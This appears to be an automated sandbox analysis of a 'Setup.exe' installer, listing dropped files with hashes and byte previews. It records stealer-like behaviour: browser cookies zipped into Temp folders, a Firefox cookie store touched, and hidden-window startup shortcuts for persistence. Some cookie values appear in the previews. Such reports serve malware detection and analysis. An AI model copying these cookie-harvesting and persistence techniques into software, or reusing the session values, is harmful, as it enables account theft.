Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." .....h>......... 17.......................................P...........`A.........................................`J.~.....J.P.....P......0N..g........... P..}....J.......................J.(...@.>.@.............J.P............................text....f>......h>................. ..`.rdata..L.....>......l>.............@..@.data...P....pK......PK.............@....pdata...g...0N..h....L.............@..@.00cfg..8.....O......RN.............@..@.gxfg....-....O......TN.............@..@.retplne......O.......N..................tls....Y.....O.......N.............@..._RDATA..\.....P.......N.............@..@.rsrc.........P.......N.............@..@.reloc...}... P..~....N.............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Programs\Setup\vk_swiftshader_icd.json

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.724752649036734
Encrypted:	false
SSDEEP:	3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
MD5:	8642DD3A87E2DE6E991FAE08458E302B
SHA1:	9C06735C31CEC00600FD763A92F8112D085BD12A
SHA-256:	32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
SHA-512:	F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
Malicious:	false
Preview:	{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

C:\Users\user\AppData\Local\Programs\Setup\vulkan-1.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	953856
Entropy (8bit):	6.582980857445342
Encrypted:	false
SSDEEP:	24576:xYWOq/4Kt/Ku8n387ecbFb6Z5WoDYsHY6g3P0zAk7so:xY65/M387R56Z5WoDYsHY6g3P0zAk7s
MD5:	0A8150E85160EA4311DDBD5B2D1B0B1B
SHA1:	A012B8886EC9F305FF4A055CCDDD5FC1F6045869
SHA-256:	0D56A41BEAD58FD5FEE44B2EE60485D4C80A3A639ACC42CFC57C8E059078DFE0
SHA-512:	D2D853D072AE7AC6871C880F164EEAA6300D9F951DE3AACB4D65195407AA4A1EF18B9BEAE14B7EDA0936E4FCA5FB56B65038370D8E349893F3C8027526415921
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." .........................................................0............`A........................................p...<!...3..P............ ...s........... ..L...............................(...@...@............7...............................text.............................. ..`.rdata..............................@..@.data...(M....... ..................@....pdata...s... ...t..................@..@.00cfg..8............J..............@..@.gxfg...P).......*...L..............@..@.retplne.............v...................tls.................x..............@..._RDATA..\............z..............@..@.rsrc................\|..............@..@.reloc..L.... ......................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79.zip

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	modified
Size (bytes):	2586
Entropy (8bit):	7.04771488585729
Encrypted:	false
SSDEEP:	48:9KGOFmFnZYpjng0tOeS+c8Su2+2Y9JbwXn2PFv9ulOKaBucOyOx5ucs:YFm3YtOeSPuiEWGtv9esBubx5u9
MD5:	DD176A1AE472C01500801080BC9C4BDA
SHA1:	588DB308944D433BD70E9808D41218D8453D4EEE
SHA-256:	B40099355F75241046526D5D6BC9D40073DBFC5174B3A1BF409B336AEE3A8960
SHA-512:	215A4FE37D949DDC438685921C44A881C88C1BB27DAFAE059ADA15AAEAD5B0976CEA3EC7A9A95ADBE49C7A28B026B0742A16BD1841C5D192E13E47BFB318CFAC
Malicious:	false
Preview:	PK........PB.X................Browser Extensions\PK........eB.X................Cookies\PK........eB.Xq..-............Cookies\Google_Default.txt...H....9...2!Y.....\|...'6....Z...}Z.3....bX ..........\...u9.x[u.1.D.Wg.e...`x....x.6....3....C.........=...0...Bqus......u.#GCg."(_...1..&7..&...l.y....Z....M..8G..Z. ..(^C.T..-....bW.#.r..9....6..3...s..G..m.1.U.._....2........}.&.\w.].......D.......\|u........:..5.......C....w{v'.<..u.]...??.nHe..H<...~..(K.J../.-.U..q..6/../q^+w..yR....Q.e.;9..L;...e..V.Mu..."k....\..&ma.7..kh..8E.<N...kV..$....q...!7.m...../...K^.bE..u}/7{.q..p./K.`..?..D.D.....y...t.D'.oe....._Q.TQ....k.O.x.Wl..(.)...XW)M..p.....v.e'%e.^...Jy.$i..M..y.....cHS.r..!I(.QB1..........i.`.o...!..Y!F...p.X..c>......._.....}24.......0....8.X.....7..........c.F.D.....c......<[{....9..7%a...}<..'."P...H...1P4..".8 .?....<..[-.4.7.:.DW..../[.=..k9....U[2..'qy..gk.AW...2......".r./W.O.."v..q.K.t..9...Q....c.=.C...y...0....F.6Y...!..........

C:\Users\user\AppData\Local\Temp\6a0ac49d-0480-6e43-9966-d7aa27ab7e79\Cookies\Google_Default.txt

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	ASCII text, with very long lines (522)
Category:	dropped
Size (bytes):	3308
Entropy (8bit):	5.836762246327351
Encrypted:	false
SSDEEP:	96:7TJfocO2joccRhocZ8bJocofo3owoUv3uoNoWbooBoIo1Xp6oNsADoqwPoAcvsA9:Bj0RT2gJ
MD5:	9CA2464D1CCB91DE27CE8CCB2A71226B
SHA1:	B3105F3090B0783517A670F5A7200044E04BE8B1
SHA-256:	4740FCC5D200692A093002F2B530CFA4C44508E10454CEFC494682D9A57EB8B8
SHA-512:	9AAE4D487F3F4CB7E295A5A5EFE906FF977F3338D95D4797535EB05733B98EC46FE0A9A84859ADC06E4711EDD20FA9442E927D93616F98BA2541170D42BF18E6
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.13355861278849698.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.AuthProvider.True.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.TRUE./.FALSE.13355861278849698.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.TRUE./.FALSE.13355861278849698.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310

C:\Users\user\AppData\Local\Temp\76dc3e7b-42c7-418c-a7d9-9ee8c15a4191.tmp.node

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1892864
Entropy (8bit):	6.574510854408502
Encrypted:	false
SSDEEP:	49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
MD5:	66A65322C9D362A23CF3D3F7735D5430
SHA1:	ED59F3E4B0B16B759B866EF7293D26A1512B952E
SHA-256:	F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
SHA-512:	0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...\|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8dc2e56e-3a34-45cd-8db1-cde7ca3b7178.tmp.node

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1892864
Entropy (8bit):	6.574510854408502
Encrypted:	false
SSDEEP:	49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
MD5:	66A65322C9D362A23CF3D3F7735D5430
SHA1:	ED59F3E4B0B16B759B866EF7293D26A1512B952E
SHA-256:	F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
SHA-512:	0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...\|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\a72c96d9-4557-4a69-8de5-5e32a2c87665.tmp.node

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	140288
Entropy (8bit):	6.055411992765344
Encrypted:	false
SSDEEP:	3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
MD5:	04BFBFEC8DB966420FE4C7B85EBB506A
SHA1:	939BB742A354A92E1DCD3661A62D69E48030A335
SHA-256:	DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
SHA-512:	4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..............C.......C.....C................................"...C...............................................Rich............................PE..d....-!e.........." ...#.>..........XG....................................................`.............................................X.......<....`.......0..$............p..........p...............................@............P..........@....................text...`=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....pdata..$....0......................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c149297e-6f19-4d06-8ddb-7807f8b84ab1.tmp.node

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	140288
Entropy (8bit):	6.055411992765344
Encrypted:	false
SSDEEP:	3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
MD5:	04BFBFEC8DB966420FE4C7B85EBB506A
SHA1:	939BB742A354A92E1DCD3661A62D69E48030A335
SHA-256:	DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
SHA-512:	4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..............C.......C.....C................................"...C...............................................Rich............................PE..d....-!e.........." ...#.>..........XG....................................................`.............................................X.......<....`.......0..$............p..........p...............................@............P..........@....................text...`=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....pdata..$....0......................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1.zip

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	modified
Size (bytes):	2586
Entropy (8bit):	7.052173199077172
Encrypted:	false
SSDEEP:	48:9WLOFmFnZYpjng0tOeS+c8Su2+2Y9JbwXn2PFv9ulOKWSucb7O5+ucJ:tFm3YtOeSPuiEWGtv9eESuX5+uI
MD5:	ECC2902E115061334024C7057A39E7BC
SHA1:	B95EBFE69D19CB8D10D3E682F0CB355B873F77EB
SHA-256:	84E028181BC9450DB109580DA9CE9D6A4704B0255E501A210B15560034F50B01
SHA-512:	BC0031D95C59883EEEF9F5A58988ECF785179A5DE32E6A4DC449095A368A015FDE058B13AC96A5FF7A2F37B8931F8CEEBE8551668E982AD22E0ABEDCADCCD622
Malicious:	false
Preview:	PK........WB.X................Browser Extensions\PK........hB.X................Cookies\PK........hB.Xq..-............Cookies\Google_Default.txt...H....9...2!Y.....\|...'6....Z...}Z.3....bX ..........\...u9.x[u.1.D.Wg.e...`x....x.6....3....C.........=...0...Bqus......u.#GCg."(_...1..&7..&...l.y....Z....M..8G..Z. ..(^C.T..-....bW.#.r..9....6..3...s..G..m.1.U.._....2........}.&.\w.].......D.......\|u........:..5.......C....w{v'.<..u.]...??.nHe..H<...~..(K.J../.-.U..q..6/../q^+w..yR....Q.e.;9..L;...e..V.Mu..."k....\..&ma.7..kh..8E.<N...kV..$....q...!7.m...../...K^.bE..u}/7{.q..p./K.`..?..D.D.....y...t.D'.oe....._Q.TQ....k.O.x.Wl..(.)...XW)M..p.....v.e'%e.^...Jy.$i..M..y.....cHS.r..!I(.QB1..........i.`.o...!..Y!F...p.X..c>......._.....}24.......0....8.X.....7..........c.F.D.....c......<[{....9..7%a...}<..'."P...H...1P4..".8 .?....<..[-.4.7.:.DW..../[.=..k9....U[2..'qy..gk.AW...2......".r./W.O.."v..q.K.t..9...Q....c.=.C...y...0....F.6Y...!..........

C:\Users\user\AppData\Local\Temp\c9ecc06d-d01f-7f76-d9f8-ef3ca6db0df1\Cookies\Google_Default.txt

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	ASCII text, with very long lines (522)
Category:	dropped
Size (bytes):	3308
Entropy (8bit):	5.836762246327351
Encrypted:	false
SSDEEP:	96:7TJfocO2joccRhocZ8bJocofo3owoUv3uoNoWbooBoIo1Xp6oNsADoqwPoAcvsA9:Bj0RT2gJ
MD5:	9CA2464D1CCB91DE27CE8CCB2A71226B
SHA1:	B3105F3090B0783517A670F5A7200044E04BE8B1
SHA-256:	4740FCC5D200692A093002F2B530CFA4C44508E10454CEFC494682D9A57EB8B8
SHA-512:	9AAE4D487F3F4CB7E295A5A5EFE906FF977F3338D95D4797535EB05733B98EC46FE0A9A84859ADC06E4711EDD20FA9442E927D93616F98BA2541170D42BF18E6
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.13355861278849698.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.AuthProvider.True.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.TRUE./.FALSE.13355861278849698.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.TRUE./.FALSE.13355861278849698.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310

C:\Users\user\AppData\Roaming\Microsoft\Installer\{8C7A072A-3005-48F5-AE5F-6D02D608DF59}\SetupIcon.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 1 icon, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
Category:	dropped
Size (bytes):	36771
Entropy (8bit):	7.941495043384916
Encrypted:	false
SSDEEP:	768:MahPkNGxnPx2McQ+G6lZcOWbeAUveHL2kdQjP10V2dgvbU8/gT3:MPegMWG6lmzbev2r5dwP10V2mvbUYgT3
MD5:	F74503B22273AEF038C811447B0727E7
SHA1:	5D57C77C7122DD42826A877CC3816130DC47EE4F
SHA-256:	709ACDA0DBF33AE8E1F3FBFF9DD7173BE9B317F9D0BC5E9CDE044F1587FA8DB7
SHA-512:	BC46D659A245A8B28C144CF090A299615AF8CA49410C6904EC3E1AA5CF0310CF5B78F979FE18C792B17E805230D0095D2A0483FA01BB3F1C3624437571650C0A
Malicious:	false
Preview:	............ ..........PNG........IHDR.............\r.f....IDATx...I.$.v...m...6..+o.y/...I....'..C./@.i$@.....L.H. ...........4.}.......=.^>..M...dee...G..70...~".4yNV6a..8yN.....e..^{m.z.P..........2&...Q.9...R.6.;J..Z.!.ik-....zZ...eY>...........:#I.J.....<..b4.........].x.K.b.".o..o......t..J._!.?....9.>3.c..ED....}.....O..O.s....._....$IHk..\|`....GZ.G.&.............2.,....~........."..J..g..o.c....6........\|....P...0Y..+..J)...@.........`../;.\|...PJ)....QJ}.....;d....#SJ..v.$i...._...PJAk.......s.1.u]...c../....._....J)..WJi.\c..&.sNIL@...^.!.P...Dd.Y....4.(P....^..e..<x....8.\m..Z..c..A@.E..(`....x9.[...?....f.\....a...]O&......5....$.{y...3..9.k-.1s.k.x9.R.....v.[....8..M...s.......O.6...7k.xI'Fd....J).i."Zo.^.!..n.........=}.t.?...../.E9...L....................b.....d.'...^\.7c..ss.s....u.xuD.$I....,.'''.>..._.....S..@..}...>C0......ar.....s..4..v.].}.....l.r=^.{l.E..N......(..mA].N....MlGk.,....(6...?..o..../0.4......~.....5..$#........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Setup.lnk

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Read-Only, Archive, ctime=Sun Jul 28 17:50:32 2024, mtime=Sun Jul 28 11:18:16 2024, atime=Sun Jul 28 17:50:32 2024, length=172671488, window=hide
Category:	dropped
Size (bytes):	2242
Entropy (8bit):	3.9203344517877237
Encrypted:	false
SSDEEP:	48:8Kb4RyV4NA7uG4u9GdIkHYdu1xhykHUyF:82cVw+YcfA+Uy
MD5:	E3929F7DA4A2A5F0503CBF26178A6507
SHA1:	7BBCE55839C64C5E54BB2CDC5930607F02F0B2AC
SHA-256:	6E7E5FB04FD1CE30F29B5D7E8495A4226602691DC9B797804B05A8458E74117E
SHA-512:	D25CB19399C8503DC3FA44B2DD9265C3E3B084C4DFF739A1EAA52C5C8161831E74E895CDC50B0AC7133ECDAE4CA6AB8868FF500EDC71B07DE86DC465D64CA190
Malicious:	false
Preview:	L..................F.@..!....L......#`.9.....L........J.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......2....p.+>........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.XDb...........................%..A.p.p.D.a.t.a...B.P.1......XFb..Local.<......CW.^.XFb....b.....................!...L.o.c.a.l.....Z.1......XHb..Programs..B.......XFb.XHb.........................._...P.r.o.g.r.a.m.s.....P.1......XLb..Setup.<.......XHb.XLb....s.......................%.S.e.t.u.p.....\.2...J..XP.!.Setup.exe.D.......XP..XIb....{.........................S.e.t.u.p...e.x.e.......d...............-.......c....................C:\Users\user\AppData\Local\Programs\Setup\Setup.exe..-.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.S.e.t.u.p...e.x.e.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.g.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.I.n.s.t.a.l.l.e.r.\.{.8.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Setup.lnk~RF492065.TMP (copy)

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Read-Only, Archive, ctime=Sun Jul 28 17:50:32 2024, mtime=Sun Jul 28 11:18:16 2024, atime=Sun Jul 28 17:50:32 2024, length=172671488, window=hide
Category:	dropped
Size (bytes):	2242
Entropy (8bit):	3.9203344517877237
Encrypted:	false
SSDEEP:	48:8Kb4RyV4NA7uG4u9GdIkHYdu1xhykHUyF:82cVw+YcfA+Uy
MD5:	E3929F7DA4A2A5F0503CBF26178A6507
SHA1:	7BBCE55839C64C5E54BB2CDC5930607F02F0B2AC
SHA-256:	6E7E5FB04FD1CE30F29B5D7E8495A4226602691DC9B797804B05A8458E74117E
SHA-512:	D25CB19399C8503DC3FA44B2DD9265C3E3B084C4DFF739A1EAA52C5C8161831E74E895CDC50B0AC7133ECDAE4CA6AB8868FF500EDC71B07DE86DC465D64CA190
Malicious:	false
Preview:	L..................F.@..!....L......#`.9.....L........J.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......2....p.+>........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.XDb...........................%..A.p.p.D.a.t.a...B.P.1......XFb..Local.<......CW.^.XFb....b.....................!...L.o.c.a.l.....Z.1......XHb..Programs..B.......XFb.XHb.........................._...P.r.o.g.r.a.m.s.....P.1......XLb..Setup.<.......XHb.XLb....s.......................%.S.e.t.u.p.....\.2...J..XP.!.Setup.exe.D.......XP..XIb....{.........................S.e.t.u.p...e.x.e.......d...............-.......c....................C:\Users\user\AppData\Local\Programs\Setup\Setup.exe..-.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.S.e.t.u.p...e.x.e.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.g.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.I.n.s.t.a.l.l.e.r.\.{.8.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Archive, ctime=Sun Jul 28 17:50:32 2024, mtime=Sun Jul 28 11:18:30 2024, atime=Sun Jul 28 17:50:32 2024, length=172671488, window=hide
Category:	dropped
Size (bytes):	1146
Entropy (8bit):	4.926026936617808
Encrypted:	false
SSDEEP:	12:8uf1b4+XQWC5XdaR+ReOKcIb4XRmijjArfIy1Ib4EawuLYLlQB44t2YZ/elFlSJX:8tae9RyV4NnArf3G4tanqyFm
MD5:	F322647FD3EEF2C5FBAA97AC76D17A00
SHA1:	EDB68E53BA894FC646A6C7E0F767CAD81CC633A9
SHA-256:	801B320CB0C1B0726777867D0E2881BAF5A054AC82D615FE57044D77CB7607EF
SHA-512:	0E60DA9BA3E8EEA46594ACFCAAA6E2DFB3E06419E20F0120984AAD72EC9EAA34E64267A0CED252F37DD923CC7A6E6A3877E1C9DC5BAC46A47F9E4CB7C6D30213
Malicious:	false
Preview:	L..................F....!....L.......6(B.....L........J.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......2.......B........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.XDb...........................%..A.p.p.D.a.t.a...B.P.1......XFb..Local.<......CW.^.XFb....b.....................!...L.o.c.a.l.....Z.1......XHb..Programs..B.......XFb.XHb.........................._...P.r.o.g.r.a.m.s.....P.1......XLb..Setup.<.......XHb.XLb....s.......................%.S.e.t.u.p.....\.2...J..XP.!.Setup.exe.D.......XP..XIb....{.........................S.e.t.u.p...e.x.e.......d...............-.......c....................C:\Users\user\AppData\Local\Programs\Setup\Setup.exe..0.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.S.e.t.u.p...e.x.e.........\|....I.J.H..K..:...`.......X.......061544...........hT..CrF.f4... .a.T..b...,.......hT..CrF.f4... .a.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~etup.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Read-Only, Archive, ctime=Sun Jul 28 17:50:32 2024, mtime=Sun Jul 28 11:18:16 2024, atime=Sun Jul 28 17:50:32 2024, length=172671488, window=hide
Category:	dropped
Size (bytes):	2327
Entropy (8bit):	3.947206826406794
Encrypted:	false
SSDEEP:	48:8Kb4RyV4NA7uG4u9GdIkHYdu1xhykHGyIfNx:82cVw+YcfA+Gy4
MD5:	0A478C12682AF41F8F9C48C7F2FDB9FE
SHA1:	7CAB1BE86F7D49C6388BF7689691833876123DE1
SHA-256:	CCDDD3ED467CBE680E843F3EA4B1240532A8639D933F4DE1857AF73EE83D98EE
SHA-512:	C49BF14A5EF149429220918210D463B78D968B5078D4008724BA52E7BE01CA563D31F0E62DDC8B30A549778E5967C09A2F58BFE48AE857D21F3C9E0BA03E14BE
Malicious:	false
Preview:	L..................F.@..!....L......#`.9.....L........J.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......2....p.+>........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.XDb...........................%..A.p.p.D.a.t.a...B.P.1......XFb..Local.<......CW.^.XFb....b.....................!...L.o.c.a.l.....Z.1......XHb..Programs..B.......XFb.XHb.........................._...P.r.o.g.r.a.m.s.....P.1......XLb..Setup.<.......XHb.XLb....s.......................%.S.e.t.u.p.....\.2...J..XP.!.Setup.exe.D.......XP..XIb....{.........................S.e.t.u.p...e.x.e.......d...............-.......c....................C:\Users\user\AppData\Local\Programs\Setup\Setup.exe..-.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.S.e.t.u.p...e.x.e.,.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.r.o.g.r.a.m.s.\.S.e.t.u.p.\.g.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.I.n.s.t.a.l.l.e.r.\.{.8.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Programs\Setup\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
